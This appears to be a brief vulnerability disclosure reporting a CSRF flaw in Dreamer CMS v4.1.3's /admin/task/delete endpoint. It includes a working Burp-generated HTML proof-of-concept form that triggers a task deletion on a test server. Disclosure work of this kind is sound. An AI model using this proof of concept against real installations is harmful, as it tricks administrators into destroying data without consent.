Target is https://github.com/iteachyou-wjn/dreamer_cms

version:4.1.3

Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/task/delete.

![1699360243454](https://github.com/CP1379767017/cms/assets/56637547/ac75d68f-8fcc-47b0-a090-3b564ac76e4d)

create poc

![图片](https://github.com/CP1379767017/cms/assets/56637547/10d88246-9c45-4414-a34a-36cd1a261ba4)


```
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.247.186:8888/admin/task/delete">
      <input type="hidden" name="id" value="1721866720087113728" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

```
successed

![图片](https://github.com/CP1379767017/cms/assets/56637547/9caac804-b234-455d-966b-105c19796564)
